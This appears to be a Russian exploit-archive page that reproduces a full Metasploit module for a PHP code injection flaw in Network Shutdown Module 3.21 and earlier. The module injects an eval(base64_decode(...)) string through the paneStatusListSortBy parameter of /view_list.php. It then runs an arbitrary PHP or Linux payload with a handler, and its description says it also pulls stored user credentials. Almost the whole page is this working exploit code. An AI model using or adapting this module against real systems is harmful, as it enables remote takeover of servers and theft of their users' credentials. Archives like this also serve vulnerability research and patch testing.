Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection PoC

Свойства

Дата публикации:
28.11.2012
Цель:
Network Shutdown Module <= 3.21
Тип воздействия:
Компрометация системы

Код

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::PhpEXE

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection',
            'Description'    => %q{
                This module exploits a vulnerability in lib/dbtools.inc which uses
                unsanitized user input inside a eval() call. Additionally the base64 encoded
                user credentials are extracted from the database of the application. Please
                note that in order to be able to steal credentials, the vulnerable service
                must have at least one USV module (an entry in the "nodes" table in mgedb.db)
            },
            'Author'         =>
                [
                    'h0ng10',  # original discovery, msf module
                    'sinn3r'   # PhpEXE shizzle
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    ['OSVDB', '83199'],
                    ['URL', 'http://secunia.com/advisories/49103/';]
                ],
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'Space'       => 4000
                },
            'Platform'       => ['php', 'linux'],
            'Arch'           => ARCH_PHP,

            'Targets'        =>
                [
                    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
                    [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
                ],
            'DefaultTarget'  => 0,
            'Privileged'     => true,
            'DisclosureDate' => 'Jun 26 2012'
        ))

        register_options(
            [
                Opt::RPORT(4679)
            ], self.class)
    end

    def check
        # we use a call to phpinfo() for verification
        res = execute_php_code("phpinfo();die();")

        if not res or res.code != 200
            print_error("Failed: Error requesting page")
            return CheckCode::Unknown
        end

        return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)
        return CheckCode::Safe
    end

    def execute_php_code(code, opts = {})
        param_name = rand_text_alpha(6)
        padding    = rand_text_alpha(6)
        url_param  = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

        res = send_request_cgi(
            {
                'uri'   =>  '/view_list.php',
                'method' => 'POST',
                'vars_get' =>
                    {
                        'paneStatusListSortBy' => url_param,
                    },
                'vars_post' =>
                    {
                        param_name => Rex::Text.encode_base64(code),
                    },
                'headers' =>
                    {
                        'Connection' => 'Close',
                    }
            })
    end

    def no_php_tags(p)
        p = p.gsub(/^<\?php /, '')
        p.gsub(/ \?\>$/, '')
    end

    def exploit
        print_status("#{rhost}:#{rport} - Sending payload")

        unlink = (target['Platform'] == 'linux') ? true : false
        p      = no_php_tags(get_write_exec_payload(:unlink_self => unlink))

        execute_php_code(p)
        handler
    end
end


или введите имя

CAPTCHA